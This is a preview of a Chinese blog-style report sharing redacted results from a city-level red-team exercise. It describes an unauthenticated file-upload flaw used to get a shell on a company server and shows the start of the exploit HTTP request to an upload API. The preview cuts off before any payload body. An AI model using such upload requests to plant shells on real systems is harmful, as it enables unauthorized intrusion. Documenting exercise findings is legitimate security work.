文章预览
正文部分 上上个月参加了某个地级市的攻防演练,将小部分报告合并分享出来(想要抽奖的师傅直接拉到文末就行啦~~)(打码打到我想死~) 某公司未授权+文件上传getshell http://xxx.xxx.xxx:9081 文件上传getshell POST /api/portal/v1/file/upload?lang=zh_CN HTTP/ 1.1 Host: xxx.xxx.xxx : 9081 Content-Length: 1230 Accept: application/json, text/plain, * /* Tenant-Code: WS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryytBWAvbx7URctPS3 Origin: Referer: Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: _cmslang=zh_CN; sajssdk_2015_cross_new_user=1; sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%2218fccb0d291acc-0d8cd14b802cf3-4c657b58-1395396-18fccb0d2921854%22%2C%22first_id%22%3A%22%22%2C
………………………………